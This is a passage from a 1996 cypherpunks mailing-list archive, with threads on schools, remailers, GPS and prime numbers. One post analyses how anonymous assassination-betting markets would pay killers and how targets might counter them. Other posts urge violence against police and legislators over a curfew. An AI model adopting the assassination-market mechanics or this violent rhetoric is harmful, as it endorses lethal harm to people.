get automatically bitbucketed at the remailer site, this could be a problem for the operator. Anyway, let's see what happens with today's tests... From dthorn at gte.net Sat Sep 28 19:51:45 1996 From: dthorn at gte.net (Dale Thorn) Date: Sun, 29 Sep 1996 10:51:45 +0800 Subject: Crypto and six yr old sex perverts: Project Electric Potatoes [CRYPTO] In-Reply-To: <960928093843_295524911@emout08.mail.aol.com> Message-ID: <324DC2AB.3CE8@gte.net> Scottauge at aol.com wrote: > Using crypto may be required to keep ya outta jail, given the > guberment has gone so far low as to "route out this six year old sex > pervert busy kissing the girls." (Quoted for emphasis.) > I wonder when sexual harassment will become a sex offence. Are the > red sashed sex cores of Orwell's 1984 around the corner? [remaining text and technical-related discussion deleted] This post is a perfect example of why you'd need a comprehensive definition of how to use the "[CRYPTO]" string in subject headers. Could I suggest: 1. [CRYPTO] at the extreme left for actual technical discussion (with examples and math, probably). 2. [CRYPTO] elsewhere in the subject line, to indicate crypto technically-related discussion without examples and math, as in the end of the Project Electric Potatoes posting. 3. [CRYPTO] nowhere in the subject line for all else. From dsmith at prairienet.org Sat Sep 28 20:29:56 1996 From: dsmith at prairienet.org (David E. Smith) Date: Sun, 29 Sep 1996 11:29:56 +0800 Subject: Mousepad RNG's? Message-ID: <199609290112.UAA17712@bluestem.prairienet.org> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: jamesd at echeque.com, cypherpunks at toad.com Date: Sat Sep 28 20:04:39 1996 > Netscape was broken through weakness in the source of > truly random numbers. No, it wasn't. Netscape was broken because their random numbers (really pseudorandom) were chosen from very poor sources (on Unix boxes, pid and ppid, maybe even the system clock :) dave - ----- David E. Smith, P O Box 324, Cape Girardeau MO USA 63702 dsmith at prairienet.org http://www.prairienet.org/~dsmith send mail with subject of "send pgp-key" for my PGP public key "Madness takes its toll . . . please have exact change ready." -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMk3LMTVTwUKWHSsJAQEWbQf9H2+cssRqpNLBa2HTL7cDPbE8dOQaWN5Q MicZPXU8ynZ4T1cw8YWHkJKsyHBR7JmAnor8dMkweAqGqu7OlGUZUTsBCoylUxjk onpCFDfHBZk+87Kdcy4JIBeuWQZjsHelk38zS4wlmcDRjeS+yXCd86UhL1jK34Z2 PTrs9Xz2LMLuyIxLwLmVZofcgtXkbWnYS0wJ8QoEjgLLMS5SsMT5g11dPMARxHYY J2XApz2fb1+CTErhaMx657+UK1ToYnbnU8ehpBSAHlOPqTIsYUOryjkAL6R+bgTo MG/ZMKCuSOvvgASPBM00fcc0SUQqxICCNz7KX+GjgHvoNCuUy1IMmA== =vgpk -----END PGP SIGNATURE----- From snow at smoke.suba.com Sat Sep 28 21:51:46 1996 From: snow at smoke.suba.com (snow) Date: Sun, 29 Sep 1996 12:51:46 +0800 Subject: Public Schools In-Reply-To: <199609280353.VAA23910@InfoWest.COM> Message-ID: <199609290153.UAA00354@smoke.suba.com> A person going by the name Attila said: > = . There is a solution. Trade Schools, > The problem was simple: we have only the now retiring > toolmakers who make it all possible. engineering graduates will > not observe the manufacturing floors since it is above their > dignity to roll of their sleeves. I knew too many engineering students to believe this. I knew one (Civil Engineering) who had been a Paramedic, he wanted grease and dirt on his hands, it may be harder to wash off, but much easier to sleep off. > if engineers were required to serve internships in the shops, > as doctors are required to intern in a hospital (and the really > good ones, the top of the class, choose what I call meat-wagon > wards (large city ER and trauma units), the U.S. would be a far > healthier and competitive environment. No argument there. > I know, why the meat wagon wards with their pressure and > unreasonable hours? experience, anything and everything > comes through those doors every night, and it goes off the scale > on the weekends... Hell, that desciribes the ER I used to work in, and it was in a college town. (Yes, I do have a sorted job history. Everything from a strip joint dj. to working as a designer for a Big 7 Accounting firm). > = .It would also seem to > = .follow that if parents were spending their own money (or > = .perceived it as their own money) that they would take a greater > = .interest in their childrens education. > = . > ...if they were smart enough to start about age 3. the Better late than never. > themselves after dark. (I do admit that one good scream would > have an extremely well-armed about to be posse out the door in > 15 seconds... --I doubt there would be prisoners!) In my neighborhood, screams are so common (mostly from kids playing, and yes, I do check as often as I can) that most people don't bother to check. Very different worlds. My wife and I are probably the only ones who _don't_ watch TV. We have 2, plus 5 computers, and 5 or 6 book shelves. The TV's were free, so were 2 of the computers. > a very unusual situation --but I live in rural southern utah > where the regional middle school of 1200 can support 4 bands, the > freshman. and, where an average ward (100-150 families) will have > at least a dozen Eagle scouts. > proves your point, I guess... Prove? I don't know, but it is some pretty solid evidense. Communism at it's finest. A community of people who work together and take care of each other voluntarily for the common good. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From snow at smoke.suba.com Sat Sep 28 22:01:01 1996 From: snow at smoke.suba.com (snow) Date: Sun, 29 Sep 1996 13:01:01 +0800 Subject: Making Remailers Widespread In-Reply-To: Message-ID: <199609290222.VAA00392@smoke.suba.com> KOTM said: > Bill Stewart writes: > > Doing two-way remailers would be better, but that's still a hard problem, > > and I don't want to widely deploy shoddy two-way-remailers. While IANAC, maybe a suggestion here (and there might be holes in this) when the email is sent to the remailer, it gets a key pair generated, and one of the keys is inserted into the header of the forwarded email like this: *****This is an anonymous message forwared from the spread remailer***** *****To reply to this message, send email with the following 4 lines**** *****as the first part of the message to: ***** =>replykey: snow at smoke.suba.com From snow at smoke.suba.com Sat Sep 28 22:05:35 1996 From: snow at smoke.suba.com (snow) Date: Sun, 29 Sep 1996 13:05:35 +0800 Subject: Workers, Public Schools, Tradesmen, and Justice In-Reply-To: Message-ID: <199609290126.UAA00307@smoke.suba.com> Mr. May said: > At 1:35 PM -0500 9/27/96, jbugden at smtplink.alis.ca wrote: > >If you want to refuse those who are too stupid or anti-social from Public > >Schools in order to improve the social or intellectual climate, you better > >have > >a solution for the resulting cast-offs. > > (And I reject any of the common arguments that Americans need to learn > history, the Constitution, etc. Few of them remember a single word they > learned, and one might as well teach the basics in earlier grades and > dispense with meaningless lectures about how and when the Senate may invoke > cloture, how the Foreign Powers Act modified the 1877 Trade Act, and so on.) I would assert that if children (ALL of them) had been thru a class in the Hows and Whys of the constitution, rather than the glossing over that I remember, our government would be a lot different. I am not talking about _just_ an intense memorization of the document, but a reading of the federalist papers (which I still haven't gotten all the way thru) and a month or two of purely discussing and analyzing the document, the Feds couldn't get away with what they are doing. I agree that students who aren't cut out for the academic life should be incouraged to persue trades, or the arts (which IMO are simply trades, and my degree will be a BFA when I finish that last Art History class) but citizenship is _everyones_ responsibility, and there are too many people clamoring for laws & amendments without thinking, and without understanding the process. Our schools are not turning out thinkers, and that is a (IMO) a fatal flaw. This is the OBCrypto part: For Crypto(in the sense of anonymity and pseudoanonymity) to truely be accepted and appreciated by the "general public (yes, a vague term), they need to understand the history of anonymous publications. They need to understand _why_ people should want to publish anonymously. The other side is that for your "crypto-anarchy" to succeed, we need people who can understand things like "algorythms" and "mathmatical proofs". The rest of this is [NOISE]. > As I look around me, here in Santa Cruz, I see hundreds of "homeless > persons.: We used to call them beggars, bums, panhandlers, winos, hobos, > and drifters. The people unwilling to get up in the morning for a boring > job, the people unwilling to take the donations they get and buy some new > clothes at the Salvation Army (I know people of both sexes who buy their > business clothes at thrift shops, at huge discounts, so I reject any of the > usual arguments that this won't work.) I have bought "work clothes"--collared shirts, trousers &etc--at SalAr, and my wife still does. She works for the Merc as a secretary. These many of these people are unwilling to do _anything_ to help themselves, and it is the fault of everyone who ever handed them a dime. As one former listmember ranted one day "You know why there are beggars in this city?"..."Because people like you (not me, his partner) GIVE THEM MONEY". People wouldn't beg if it got them nothing. > When I see people working at Taco Bell, Burger King, gas stations, etc., > and then I see the so-called "homeless," the situation is completely clear > to me. And, like pigeons, if you begin feeding the beggars, you'll have > more of them. Oops. You made that point. > For the last couple of weeks I've been hauling 70-pound stones to build a > retaining wall (don't ask me about the permits I should've gotten), ripping > up redwood deck boards, digging postholes for a new fence, and generally > doing a couple of hours of manual labor every day. While it has its > advantages, in earlier days I could've counted on providing some employment > for someone who today is "a homeless person." No more. They're not > psychologically prepared to do a solid (if unspectacular) job, as they've > been taught for all of their lives that they went through high school and > maybe a couple of years of college (and maybe more) so they could join the > professional ranks....when they see they really won't be joining the > professional ranks, and that they really don't want to make the sacrifices > to, they have nothing to fall back on. While I'd agree that this is true for many, I know some (me, my brother and a couple of my cousins) that have done work like this more than once. Not that I would do that kind of work (for pay) today, unless I was _real_ desperate. Then again, it could be a family thing. > get money. They won't get "entitlements" from the government (= taxpayers, > = those who are working, = me and thee). Tell them that a college education > should only be pursued if one has a "calling" to be an engineer, a > programmer (and probably not even that, judging by what I see), a doctor, a > lawyer (on second thought, don't ever suggest they become lawyers), and so > on. I see no reason that general programming shouldn't be considered a trade. Maybe more "pure" math than a carpenter, or a mechanic, but they don't need the english, general history, & etc. that other "academic" careers need. > And make it easier to hire people, instead of harder. (And if one hires a > maid, and the maid steals, cut off her hand. We've lost sight of justice, > and people think that ripping off the rich is their kind of justice. This > needs to change.) Cutting off hands is a little drastic. Too prone to false aqusations, and too hard to erase if the courts are wrong. Three years at hard labor on bare sustance would be about right tho', and if the aqusation is proved false, it is erase from the record. > This is why crypto anarchy's starving of the tax system is good. It may > "kill" some number of people, as nearly any new idea does, but ultimately > it will put things back on track. People die for all manner of reasons every day. Fuck'em. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From themom at nando.net Sat Sep 28 22:39:32 1996 From: themom at nando.net (themom) Date: Sun, 29 Sep 1996 13:39:32 +0800 Subject: Public Schools In-Reply-To: Message-ID: I have to agree with the final Quote....I am Good in math, chemistry and computer science I am good in any Logical cource but I have trouble in places liek " Creative Writing" I take all AP cources and make A's and B every now and again in english...I have a 3.7 gpa but a LOW sat in the grammar and english sections, 1100 in all I don't think colleges should look at the subjects you dont plan to major in...I plan to major in computer science when I go to college, so I dont think they should look so much at say english, or biology. I get so frustrated in some of those classes....BTW I am a Junior in highschool Brent On Sat, 28 Sep 1996, The Deviant wrote: > On Fri, 27 Sep 1996, snow wrote: > > > Date: Fri, 27 Sep 1996 20:09:36 -0500 (CDT) > > From: snow > > To: jbugden at smtplink.alis.ca > > Cc: cypherpunks at toad.com > > Subject: Re: Public Schools > > > > James said: > > > ronsimpson at unidial.com wrote: > > > >I hate to burst any bubbles but, the school with the highest number > > > > of National Merit Finalists and highest number of 1600 SATs is a=20 > > > > Public High School (Jefferson High in Fairfax, VA) > > > The same is true for Montreal (Royal Vale) using the equivalent scoring methods. > > > But there are public schools at both extremes of the curve. > > > While it is true that Private Schools would not survive due to market forces if > > > they did consistently poorly, it is also true that they filter their incoming > > > student body in a manner that Public Schools can not. > > > If you want to refuse those who are too stupid or anti-social from Public > > > Schools in order to improve the social or intellectual climate, you better have > > > a solution for the resulting cast-offs. > > > > There is a solution. Trade Schools, and Parental Envolvement. It could > > very well be (and if I had the money I'd make the bet) that _many_ of the > > "troubled" youth of today are simply undisiplined. (Fortunately, most of > > them couldn't afford to bet against their parents in an AP world). It would > > also seem to follow that if parents were spending their own money (or > > perceived it as their own money) that they would take a greater interest in > > their childrens education. > > > > For those that are truly not scholastically oreinted, there would be > > trade schools. I would also bet that you could teach a child everything they > > need to learn (other than a trade) to cope in this world in about 4 years. > > > > But now we must make a disinction... I'm LD in writing, but can read very > well (when I was in 6th grade I could read like a 10th grader), and do > very well in Math and Computer classes (and non-biological/anatomical > sciences). So should I be in trade school, because I plan on being a > computer programmer, or go to college? Sure, I don't do well in language > and (depending on the class) some history classes, which, IMHO, are > weighted more heavily than they should be in both public _and_ private > schools (and yes, I've been to both), but I don't think that should mean I > can't go to college... > > Anyway, my point is that there is, at times, a very fine line... > > --Deviant > When we write programs that "learn", it turns out we do and they don't. > > From hallyn at cs.wm.edu Sat Sep 28 22:56:01 1996 From: hallyn at cs.wm.edu (Serge E. Hallyn) Date: Sun, 29 Sep 1996 13:56:01 +0800 Subject: sophie germain primes Message-ID: <199609290344.XAA05661@astro.cs.wm.edu> Could anyone direct me to an online list of small (less than 800-digit) Sophie Germain primes? (actually any list would do) many thanks, -serge hallyn at cs.wm.edu From stewarts at ix.netcom.com Sat Sep 28 22:59:26 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 13:59:26 +0800 Subject: GPS Message-ID: <199609290407.VAA20249@dfw-ix3.ix.netcom.com> >2. The DoD is doing a study right now on how to make GPS useless to the >enemy at wartime. >I think figuring out a way to turn off A/S and getting accurate GPS on >commercial equipment at all times would make a nifty Cypherpunks project >- if it really involves breaking some encryption. Essentially the A/S works by having the publicly-readable signal contain fuzz fuzz in the low-order bits and the encrypted signal contain the real stuff; if they've done decent encryption, you won't crack it. However, the fuzz _is_ consistent - if you've got two nearby points, and you really know where one of them is, you can correct for it, and get better accuracy even than the full GPS with A/S turned off. The approach the Feds are taking to prevent competition from real differential GPS is to field a differential GPS system of their own, located at/near airports (who are the real people who want D-GPS, so they can do things like better instrumented or automated landings.) This way, nobody's got much financial incentive to deploy D-GPS correction transmitters of their own, and manufacturers have an incentive to deploy equipment tuned to the FAA's correction transmitters, so they can still turn them off if they want to. Except for takeoff/landing, airplanes don't much need differential GPS; you shouldn't be flying within a hundred meters of other planes anyway, and if you're doing cropdusting or barnstorming you'd better be able to see what you're doing or have good radar anyway - most topographic maps don't have tall trees marked on them. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From rwright at adnetsol.com Sat Sep 28 23:24:10 1996 From: rwright at adnetsol.com (Ross Wright) Date: Sun, 29 Sep 1996 14:24:10 +0800 Subject: sophie germain primes Message-ID: <199609290436.VAA16148@adnetsol.adnetsol.com> Sir: Lot's of stuff on primes, right here: http://daisy.uwaterloo.ca/~alopez-o/math-faq/node10.html Hope it helps. On or About 28 Sep 96 at 23:44, Serge E. Hallyn wrote: > Could anyone direct me to an online list of small (less than 800-digit) > Sophie Germain primes? > > (actually any list would do) > > many thanks, > -serge > > hallyn at cs.wm.edu > > =-=-=-=-=-=- Ross Wright King Media: Bulk Sales of Software Media and Duplication Services http://www.slip.net/~cdr/kingmedia Voice: 415-206-9906 From attila at primenet.com Sat Sep 28 23:25:54 1996 From: attila at primenet.com (attila) Date: Sun, 29 Sep 1996 14:25:54 +0800 Subject: Public Schools In-Reply-To: <199609290153.UAA00354@smoke.suba.com> Message-ID: <199609290418.WAA23501@infowest.com> In <199609290153.UAA00354 at smoke.suba.com>, on 09/28/96 at 08:53 PM, snow said: A person going by the name Attila said: > There is a solution. Trade Schools, > The problem was simple: we have only the now retiring >toolmakers who make it all possible. engineering graduates will not >not observe the manufacturing floors since it is above their >dignity to roll of their sleeves.  I knew too many engineering students to believe this. I knew one (Civil Engineering) who had been a Paramedic, he wanted grease and dirt on his hands, it may be harder to wash off, but much easier to sleep off.  he's the exception, not the rule. I paid my way through Harvard as a tool and die maker --if the engineers had to make some of the crap they designed, they would design them that way again. > if engineers were required to serve internships in the shops, >as doctors are required to intern in a hospital (and the really good >ones, the top of the class, choose what I call meat-wagon wards >(large city ER and trauma units), the U.S. would be a far healthier >and competitive environment.  No argument there. > I know, why the meat wagon wards with their pressure and >unreasonable hours? experience, anything and everything comes >through those doors every night, and it goes off the scale on the >weekends...  Hell, that desciribes the ER I used to work in, and it was in a college town. (Yes, I do have a sorted job history. Everything from a strip joint dj. to working as a designer for a Big 7 Accounting firm). > It would also seem to > follow that if parents were spending their own money (or > perceived it as their own money) that they would take a greater > �nterest in their childrens education. > =. > ...if they were smart enough to start about age 3. the  Better late than never. unfortunately, the conservative child care people believe the pattern may be irretrievably set by the age is six. you need to start with the child from the gate with the nuture --reduces fear of abandonment, &c. and encourage trust so they will go to others without a tantrum, &c. President Hillary, of course, believes in *her* global village with *her* central government dictating for all --community raising a generation of raison heads! --from day 1! > themselves after dark. (I do admit that one good scream would >have an extremely well-armed about to be posse out the door in 15 >seconds or less... --and, I doubt there would be prisoners!) you want a concealed weapon permit? --just go register.  In my neighborhood, screams are so common (mostly from kids playing, and yes, I do check as often as I can) that most people don't bother to check.  a scream of terror is a different scream. besides, we have 6 families in our 8-10 acre section --33 kids between us. and our air raid siren would be howling like an inbound kamikaze. Very different worlds. My wife and I are probably the only ones who _don't_ watch TV. We have 2, plus 5 computers, and 5 or 6 book shelves. The TV's were free, so were 2 of the computers. we're light on computers at the moment --only 3, and I need 3 more. bookshelves? 30 feet, floor to ceiling, packed. trying save enough to get one of the 7 CD rom up in parallel deals for the 8G freeBSD fileserver --OS/2 (merlin) workstations. stuff is expensive, even when you buy right. well, out here, probably 20% of the families did not have a TV; I gave the "message" one Sunday a couple months ago and the percentage has gone up. those who did have TVs have them severely restricted for content --there are no R movies tolerated --and most do not bring in a commercial signal --VCRs. the population base is changing with an influx of non-Mormons in town, so R rated are showing up at the theatres and video rentals in town. the police visible prescence is effective --a force of 50+ for a population base < 25,000, plus the county sherrif cars and the state police. Curfew is 10pm weekdays for minors --and they enforce it, big time. midnight Fri/Sat. > a very unusual situation --but I live in rural southern utah >where the regional middle school of 1200 can support 4 bands, > >and, where an average ward (100-150 families) will have at >least a dozen Eagle scouts. > proves your point, I guess... ...idle hands are the devil's workshop. you want good solid kids, you start from the gate and keep 'em busy: home, neighbors, school, church, etc. yes, you work hard for it --every day. I have 5, and it can be a real task with internecine warfare and all that good stuff. It starts at home and goes the route. there is no dead time on a streetcorner, or at friends house without a parent home. they do not date until they are 16 --in groups. boys and girls --the same rules.  Prove? I don't know, but it is some pretty solid evidense. Communism at it's finest. A community of people who work together and take care of each other voluntarily for the common good. good thing you added the --half redneck republicans --half further right clinton, let alone communism, is a fighting word.... conspiracy theory is live and well. as far as anyone around here is concerned, Waco and Ruby Ridge were to establish a need for gun control, militia bans, privacy abridgements, CDA, crypto bans, &c. opinion on the government in the midst of OKC and TWA is moving into the positive range --and there is absolutely no doubt of Bubba's cocaine habit or the stink of Mena airport. BTW, the education level is way above the national average; not very many dummies out here. we do have an advantage: BYU is $3K/semester for LDS members, and you need 3.7 to 4.0 to get in. schools --if YOU don't support them, you and we don't have them! -- "God forbid we should ever be 20 years without such a rebellion. . . . What country can preserve it's liberties if their rulers are not warned from time to time that their people preserve the spirit of resistance?. . .The tree of liberty must be refreshed from time to time with the blood of patriots and tyrants." --Thomas Jefferson, regarding anarchy. From stewarts at ix.netcom.com Sat Sep 28 23:28:42 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 14:28:42 +0800 Subject: Technical difficulties with AP [AP NOISE] Message-ID: <199609290407.VAA20253@dfw-ix3.ix.netcom.com> Aside from details like dead bodies, vendettas, and government suppression, there are technical complications with Assassination Politics that make it more than the simple job Jim Bell is imagining. Some of them provide ways to defend against AP, and turn it into more like Extortion Politics. [Do I _really_ want to bring up more discussion of AP? Not sure, but if it's clear that it won't work very well, it'll be less likely for the government media to freak about :-)] Let's look at the critical part of the problem - paying the assassin. The model we've generally been using is that the players are the victim, the escrow agent who manages the system, an enthusiastic public, and the assassin or assassins who are competing for the jackpot. I can see three approaches to identifying the correct payee: 1) Payee provides physical evidence to the escrow agent - the traditional approach doesn't work here: since the escrow agent is anonymous, so you can't mail him the victim's wallet or finger with well-known fingerprint or whatever. 2) Assassin leaves physical evidence at the scene which the news media would be likely to report, which payee confirms with escrow agent, presumably committing in advance (e.g. after the event, the payee sends a key which allows the escrow agent to decode the encrypted message that said "I'm leaving a note on the body saying 'Jacques De Molay is Avenged - Assassin's Guild Member #32767'.") Works fine for the first couple of assassinations, but after a while the police will catch on and stop revealing kinky details to the media. 3) The main solution has been the gambling deal - it's just a lottery on the date of death of the victim, which presumably the payee will win because he knows when the assassin will strike. For a lottery to be effective, prospective assassins need to be able to determine how much the jackpot is and who the victim is, so they can place their bets and be the closest winner. But the prospective victim can also play, individually or as part of an insurance pool (which is especially valuable for victims like "the first IRS agent to be assassinated".) Obviously you don't want to just bid up the price on your own head, so it needs to be accompanied by publicity that the IRS Agents' Benevolent Association is placing a large number of small bets every day to maximize the chances that _they_ will collect the money rather than the assassins. If the times that the bets are for are published, you can beat this, but you also invite speculators to be small bets just before and after your bets, so it becomes a mishmash and perhaps a race condition. If the times aren't published, the assassin can make lots of bets surrounding the planned date of the hit, which is also a warning to the prospective victim to be careful if the bets on his demise start increasing rapidly. This does make the AP lottery somewhat of an extortion deal - by advertising that someone is a target, you're forcing them to continually make lots of bets. But if they've got any way of tracing money, even partially, it'll help them find the escrow agent, who can then be targeted for justice of one sort or another. You're also forcing the assassin to make lots of bets, though in a jackpot system the successful payee will recover most of it. To some extent the defense can be fought if the escrow agent wants to establish a minimum bet, say $100, which an assassin can afford to make a few of for the targeted day, but the victim can't keep paying too much. This also reduces the since of the potential better pool, and therefore reduces the jackpot and the attractiveness of the job to the assassin. Lots of people might be willing to spend $5 to contribute; $100 bets are much fewer, especially if there are enough targets to successfully overthrow a government. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From stewarts at ix.netcom.com Sat Sep 28 23:30:55 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 14:30:55 +0800 Subject: [NOT NOISE] Jena Remailer Message-ID: <199609290412.VAA20552@dfw-ix3.ix.netcom.com> At 04:10 PM 9/28/96 -0700, anonymous wrote: >My first thought was to have them sent to a non-autopinging *.test ng >via a well-tested parsing mail2news gate, but some autopingers ping ALL >*.test traffic passing through a site. If these ping messages didn't >get automatically bitbucketed at the remailer site, this could be a >problem for the operator. Most of the autopingers will ignore messages with "ignore" in the Subject: line. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From attila at primenet.com Sat Sep 28 23:41:59 1996 From: attila at primenet.com (attila) Date: Sun, 29 Sep 1996 14:41:59 +0800 Subject: active practice in America In-Reply-To: <199609290133.UAA00319@smoke.suba.com> Message-ID: <199609290438.WAA23813@infowest.com> In <199609290133.UAA00319 at smoke.suba.com>, on 09/28/96 at 08:33 PM, snow said: A Person going by the name Attila said: > to put it another way: in criminal procedings: I would rather >be considered guilty, until proven innocent; than I would be >presumed innocent, until proven guilty beyond a reasonable doubt.  If you were the person being _tried_ for a crime, you would rather have to prove that you COULDN'T POSSIBLY have commited the crime as opposed to having to have the government PROVE that you DID DO it?  you bet --the objective of the defense is to cast aspersions on the government prosecuters --in other words, create that doubt. you do not need to prove your innocence unconditionally, just "taint" the prosecuter a bit. however, in many cases you are guaranteed a trial by a jury of your peers. as for peers --look at OJ, and the reverse weighting of the Santa Monica jury v. downtown. > a nation whch can base a conviction on conspiracy to commit a >crime, or permits circumstantial evidence to close the gap towards >'beyond a reasonable doubt,' has lost any pretense of understand- > ing the heritage of common law: the Magna Carta.  Of that, there is no denying. the example I have always used: three men were drinking in a bar across the street from a ripe looking bank. they sit there and plot a knockoff. one gets stinking drunk and passes out on the floor. the other two go across the street to be arrested for the attempted heist. the police arrest the drunk on the floor. why? "conspiracy to commit the crime!" and the penalty is the same: 7-20 years in the federal slam. --unless you are socially disadvantaged and claim heroin addiction; then you make it to the street in as little as 18 months and wipe the tail within 7 years, not 20. the rule was the offender must be less than 25, it may have been raised. or, you could hire an expensive member of the boys' club and might trade someone elses body for your freedom.... that's justice in Amerika, folks! you like it, right? From Adamsc at io-online.com Sun Sep 29 00:33:11 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 15:33:11 +0800 Subject: Public Schools Message-ID: <19960929052112562.AAH154@GIGANTE> On Fri, 27 Sep 1996 09:22:05 -0400, ronsimpson wrote: >I hate to burst any bubbles but, the school with the highest number of >National Merit Finalists and highest number of 1600 SATs is a Public >High School (Jefferson High in Fairfax, VA) This probably just means that they have a good SAT cram course. Ditto for the NMS. I've run into people who've done well on the SATs and have been rather underwhelmed. In my opinion it's like MIPS: Meaningless Indicator # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From tcmay at got.net Sun Sep 29 00:50:27 1996 From: tcmay at got.net (Timothy C. May) Date: Sun, 29 Sep 1996 15:50:27 +0800 Subject: Utah as a Religious Police State In-Reply-To: <199609290153.UAA00354@smoke.suba.com> Message-ID: Hey, Attila, let me know where you folks live...I may want to move there! At 2:56 AM +0000 9/29/96, attila wrote: > the population base is changing with an influx of non-Mormons > in town, so R rated are showing up at the theatres and video > rentals in town. Just so long as my DSS dish still works in Utah--hey, I'll invite all the jack Mormons over for tomorrow night's showing of "Inside Janine," on the "Playboy Channel." (The "Playboy Channel" is kind of tame by video rental standards, but more crotch shots than we used to see a couple of years ago.) > the police visible prescence is effective --a force of 50+ for > a population base < 25,000, plus the county sherrif cars and the > state police. Curfew is 10pm weekdays for minors --and they > enforce it, big time. midnight Fri/Sat. They enforce the "curfew" big time? Looks like some Mormon pigs need to be zapped. (My kids don't cotton to no cop telling them when they can be out in public and when they can't. Any cop who tries to stop my kids from being out has earned severe retaliation. Any councilmember or state legislator who voted for such a curfew needs to be hog-tied, covered with tar, then torched.) I guess this is why I wouldn't last very long in Mormon Country. A fascist encampment, it sounds like. (I have no problem with Mormons, or Catholics, or Muslims, or Satanists keeping _their own_ children indoors after 7, or 5, or whatever their Holy Hour or Curfew Hour is, but no fucking religious nuts are going to tell _me_ when _my_ children must be indoors. I determine where my children may be, and I don't need the State's permission for them to be out. I would think anyone with an iota of libertarian sentiment would understand this.) > ...idle hands are the devil's workshop. you want good solid > kids, you start from the gate and keep 'em busy: home, neighbors, > school, church, etc. Do Utah's cops also enforce this law, too? > they do not date until they are 16 --in groups. boys and > girls --the same rules. With the Utah State Police enforcing this "dating curfew"? (I may sound harsh here, but "curfew" means one and only one thing to me: somebody restricting my freedom of those of my children to be a public place. Should one of my children be picked up by cops for doing nothing illegal, save for being "out past curfew," I'd consider violent response to be justified. It sounds to me--not that I ever thought otherwise--that Utah is not a land that favors liberty.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From shamrock at netcom.com Sun Sep 29 00:56:47 1996 From: shamrock at netcom.com (Lucky Green) Date: Sun, 29 Sep 1996 15:56:47 +0800 Subject: GPS In-Reply-To: <199609290407.VAA20249@dfw-ix3.ix.netcom.com> Message-ID: On Sat, 28 Sep 1996, Bill Stewart wrote: [Quoting sombody else] > >2. The DoD is doing a study right now on how to make GPS useless to the > >enemy at wartime. > >I think figuring out a way to turn off A/S and getting accurate GPS on > >commercial equipment at all times would make a nifty Cypherpunks project > >- if it really involves breaking some encryption. [...] > Except for takeoff/landing, airplanes don't much need differential GPS; > you shouldn't be flying within a hundred meters of other planes anyway, > and if you're doing cropdusting or barnstorming you'd better be able > to see what you're doing or have good radar anyway - most topographic > maps don't have tall trees marked on them. It may be considerably more than 100 meters if you have the ill fortune to get caught in one of the GPS jamming tests the Air Force is currently conducting. AOPA Pilot reports in their September issue that only now the Air Force has at least agreed to clasify their GPS-ECM (Electronic Countermeasures) as distance notams, meaning they'll warn pilots in advance. Anyway, encryption has nothing to do with these ECM. --Lucky From Adamsc at io-online.com Sun Sep 29 01:02:58 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 16:02:58 +0800 Subject: Public Schools Message-ID: <19960929054253390.AAA193@GIGANTE> On Fri, 27 Sep 1996 09:20:10 -0800, Timothy C. May wrote: >(Seriously, my view is that schools are not very important. All success, >academic or technical, derives from one basic determining factor: those who I always liked Robert Heinlein's comment: "It's possible to get a good education anywhere, if you are willing to work for it". Unfortunately not many people want to work for anything... >read for pleasure, succeed, and those who don't read for pleasure, don't. ++agree. >taught usable trades. Seriously. Our "ideal" that all children should >attend college is absurd, given the lack of academic preparation, desire, >and reading skills that so many high school students lack. Most community Not only that, what are all these college grads going to do? Only a small percentage are going to be making waves in a given field. Many are just going to lower the overall average... Worse yet, many become lawyers . A society with such a high percentage of parasites (those who don't add value sufficient to cover expenses) isn't healthy. >colleges are essentially becoming Grades 13-14, with most of the Grade Why are they going to college? Well they weren't learning it in HS. They did however learn to feel good about themselves, use a condom and handle complex social situations (see: gossip. Or, for the average guy, see: wedgie). What use this serves is an excellent question. >13-14 students reading at the 9th-grade level (which most of us on this >list were reading at when we were in the 7th-grade, or earlier).) That's putting it mildly. . . I read 200+ pages/hour with a very high retention rate. Needless to say, this means I move through books at high speed. Quite a few times I've had the experience of summarizing a "Great Work" to a college-educated teacher. Almost scary. Equally bad are the people who read but do not understand. The term functionally illiterate comes to mind. We may joke that people switch into "Idiot Mode" (Apologies to the BOFH author) around computers but I've run into a number of people who are apparently stuck in it. # Chris Adams | http://www.io-online.com/adamsc/adamsc.htp # | send mail with subject "send PGPKEY" "That's our advantage at Microsoft; we set the standards and we can change them." --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial) From Adamsc at io-online.com Sun Sep 29 01:05:23 1996 From: Adamsc at io-online.com (Adamsc) Date: Sun, 29 Sep 1996 16:05:23 +0800 Subject: Workers, Public Schools, Tradesmen, and Justice Message-ID: <19960929055435234.AAA224@GIGANTE> On Fri, 27 Sep 1996 13:01:13 -0800, Timothy C. May wrote: >My conclusion is simple: Tell people if they don't work, they won't eat. If >they do something others are willing to give them money to do, they won't >get money. They won't get "entitlements" from the government (= taxpayers, >= those who are working, = me and 